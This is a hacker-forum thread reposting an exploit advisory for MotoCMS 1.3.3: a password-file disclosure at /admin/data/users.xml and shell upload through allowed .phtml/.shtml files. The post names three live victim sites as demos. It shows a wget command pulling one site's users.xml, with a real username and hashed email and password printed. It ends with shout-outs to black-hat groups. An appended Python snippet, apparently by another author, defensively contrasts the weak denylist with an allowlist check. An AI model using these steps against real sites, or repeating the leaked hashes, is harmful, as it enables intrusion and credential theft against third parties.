Anti-armenia.ORG - Forums - MotoCMS 1.3.3 Password File Disclosure / Shell Upload



User
    2013-01-10 23:38 GMT

BlackMinD
This CMS, though, is an epic fail)
You can build pretty Flash-based sites with this CMS, but its authentication is a laughable method)
For that reason:
MotoCMS 1.3.3 Password File Disclosure / Shell Upload
http://packetstormsecurity.com/files/119365/MotoCMS-1.3.3-Password-File-Disclosure-Shell-Upload.html

Code:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm AkaStep member from Inj3ct0r Team                  1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

=================================================
Software:  MotoCMS
Official Site: http://www.motocms.com/
Vulns: MotoCMS <=1.3.3 Password File disclosure && Code/Command execution
Software license: Commercial
=================================================
About Software:

MotoCMS™ is an advanced Flash CMS that
allows Flash developers and the users with no programming skills
to easily create stunning Flash websites.

=================================================
About vulns:
Design flaw.

Trouble N1: This software is prone to a password file disclosure vulnerability,
because it fails to protect sensitive data from HTTP access.

Trouble N2: In this CMS some filetypes (php5, php) are not allowed to upload,
but .phtml and .shtml are allowed.
Using the 2nd issue it is possible to upload a shell (via .phtml) and also possible to execute server commands via the
SSI #exec directive (if enabled on the server side, or the include directive, e.g. to read files).


Some Demos:
http://kattmodels.com/admin/data/users.xml
http://www.atcfc.ca/admin/data/users.xml
http://ustanovka-spb.ru/admin/data/users.xml



$ wget --user-agent="Mozilla Firefox 3 Gecko 12" http://kattmodels.com/admin/data/users.xml && cat user*.xml
--2013-01-09 06:10:11--  http://kattmodels.com/admin/data/users.xml
Resolving kattmodels.com (kattmodels.com)... 208.109.47.128
Connecting to kattmodels.com (kattmodels.com)|208.109.47.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187 [application/xml]
Saving to: `users.xml'

100%[==============>] 187         --.-K/s   in 0s

2013-01-09 06:10:16 (2.75 MB/s) - `users.xml' saved [187/187]

<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user id="1263066591" name="pmanoloutsos" email="cb6afd35d37afd07dfcfdcb45e80026b" password="38740d1f9877b41f784a0859604c2d3c"/>

</users>
=================================================


==RANDOM QUOTE OF THE DAY:======GOTDU OGUL ISTEREM! LOOOOOOOL===


===============
KUDOSSSSSSS:
===============
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep
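Added example (my own code, not from the advisory, from AkaStep or from MotoCMS): a Python model of the extension denylist the advisory describes (php/php5 rejected, everything else accepted) beside an allowlist check that refuses .phtml/.shtml, dot-files and double-extension names. The EXECUTABLE and ALLOWLIST sets are assumptions chosen for a Flash site builder, not MotoCMS's actual lists.

```python
import os
import re

# Extensions the advisory says MotoCMS <= 1.3.3 rejects on upload (a denylist).
DENYLIST = {"php", "php5"}

# Server-side executable extensions a defender should refuse: the advisory's
# .phtml/.shtml plus common PHP, SSI and CGI handler variants (assumed list).
EXECUTABLE = {
    "php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar",
    "shtml", "shtm", "stm", "cgi", "pl", "htaccess",
}

# Allowlist of what a Flash site builder actually needs to accept (assumed).
ALLOWLIST = {"jpg", "jpeg", "png", "gif", "swf", "mp3", "flv", "xml", "txt"}


def weak_denylist_allows(filename: str) -> bool:
    """Model of the flawed check: reject only php/php5, accept everything else."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENYLIST


def hardened_allows(filename: str) -> bool:
    """Allowlist check: accept only a known-safe final extension, a conservative
    stem, and no executable extension anywhere in the name (shell.phtml.jpg)."""
    # Ignore any path component and the trailing dots/spaces some filesystems drop.
    name = os.path.basename(filename).strip().lower().rstrip(". ")
    parts = name.split(".")
    if len(parts) < 2 or not re.fullmatch(r"[a-z0-9_-]+", parts[0]):
        return False  # no extension, or a dot-file such as .htaccess
    if parts[-1] not in ALLOWLIST:
        return False  # .phtml, .shtml, .php and anything unexpected stop here
    # Apache with AddHandler can execute "x.phtml.jpg", so refuse inner
    # segments that name an executable handler as well.
    return not any(p in EXECUTABLE for p in parts[1:-1])


def compare(filenames):
    """Return {name: (weak_allows, hardened_allows)} for a batch of names."""
    return {f: (weak_denylist_allows(f), hardened_allows(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample upload names, including the advisory's .phtml/.shtml case.
    for name, (weak, hard) in compare(
        ["logo.swf", "shell.php", "shell.phtml", "cmd.shtml", "shell.phtml.jpg"]
    ).items():
        print(f"{name:16} denylist={weak!s:5} allowlist={hard}")
```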

User
    2013-01-11 18:50 GMT

Ferid23
Congratulations
